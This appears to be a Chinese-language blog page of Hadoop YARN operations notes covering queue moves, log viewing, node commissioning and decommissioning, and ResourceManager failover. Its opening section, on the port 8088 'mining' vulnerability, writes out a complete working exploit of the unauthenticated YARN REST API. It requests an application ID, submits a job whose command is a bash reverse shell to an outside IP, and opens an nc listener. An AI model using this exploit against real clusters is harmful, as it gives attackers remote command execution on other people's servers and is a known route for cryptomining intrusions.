Contents
  1. 1. 8088挖矿漏洞
  2. 2. application修改队列
  3. 3. 查看日志
  4. 4. 节点服役退役
    1. 4.1. 节点服役
    2. 4.2. 节点退役
      1. 4.2.1. yarn
  5. 5. 主备切换

8088挖矿漏洞

发起获取appID
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application

新建任务信息文件1.json反弹shell
{
‘application-id’: ‘application_1639358619460_0019’,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1’
}
},
‘application-type’: ‘YARN’
}

启动监听
nc -lvvp 8888

发起任务
curl -s -i -X POST -H ‘Accept: application/json’ -H ‘Content-Type: application/json’ http://10.33.21.190:8088/ws/v1/cluster/apps –data-binary @1.json

application修改队列

yarn application -movetoqueue application_1667986310829_98856 -queue spark

查看日志

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head
yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
ls -R out/* |grep 01_000001

节点服役退役

节点服役

hadoop/etc/hadoop/dfs.include
hdfs dfsadmin -refreshNodes

节点退役

yarn

echo “10.17.41.133” > nodemanager.excludes

vi yarn-site.xml

1
2
3
4
<property> 
<name>yarn.resourcemanager.nodes.exclude-path</name>
<value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value>
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server

节点NM进程会自动结束

主备切换

yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby –forcemanual rm2
yarn rmadmin -transitionToActive –forcemanual rm1